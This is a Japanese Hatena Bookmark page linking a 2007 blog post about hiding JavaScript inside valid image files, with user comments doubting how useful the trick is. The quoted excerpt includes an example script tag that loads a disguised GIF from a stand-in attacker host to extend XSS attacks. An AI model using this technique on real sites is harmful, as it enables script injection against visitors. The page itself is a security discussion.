気に入った記事をブックマーク
- 気に入った記事を保存できます
保存した記事の一覧は、はてなブックマークで確認・編集ができます
- 記事を読んだ感想やメモを書き残せます
- 非公開でブックマークすることもできます
エントリーの編集
エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
記事へのコメント32件
- 注目コメント
- 新着コメント
yamap_55
試してみたけど画像としては壊れてるっぽい。2007年当時のブラウザでは表示できたのかな? https://gist.github.com/yamap55/418bb260e5eb55bf278b
yamap_55
試してみたけど画像としては壊れてるっぽい。2007年当時のブラウザでは表示できたのかな? https://gist.github.com/yamap55/418bb260e5eb55bf278b
dissonance_83
クローズドの場だからとネットで見つけた他人の「作品」をノーリスペクト、ノーコストで「素材」と言って手抜きの為に使う事を正当化する方々に灸を据える為に使うといいかも…まぁ私はしないけどね
hasegawayosuke
<script>からしか利用できないし<script>が通るならリモートにスクリプトを置けばよいので、「XSS攻撃を拡張する手段に利用可能」ではあるけど(攻撃者にとっての)メリットがよくわからん。//誤魔化す文字はus-asciiで2倍使える
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています
いまの話題をアプリでチェック!
- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
yohgaki's blog - 画像ファイルにJavaScriptを隠す
(Last Updated On: )前回のエントリでイメージファイルにスクリプトを埋め込んで攻撃する方法について記... (Last Updated On: )前回のエントリでイメージファイルにスクリプトを埋め込んで攻撃する方法について記載しましたが、最近イメージファイルにスクリプトを埋め込む事例が話題になったためか ha.ckersにJavaScriptをイメージファイルに隠す方法が紹介されています。 http://ha.ckers.org/blog/20070623/hiding-js-in-valid-images/ <script src="http://cracked.example.com/cracked.gif"> などとXSS攻撃を拡張する手段に利用可能です。サンプルとしてFlickerにJavaScriptを埋め込んだイメージファイルがアップされています。 このイメージファイルは上手く細工しているので画像としても表示され、JavaScriptも実行できます。 Flickerは画像ファイルをそ
ブックマークしたユーザー
すべてのユーザーの
詳細を表示します
詳細を表示します
2015/09/09 リンク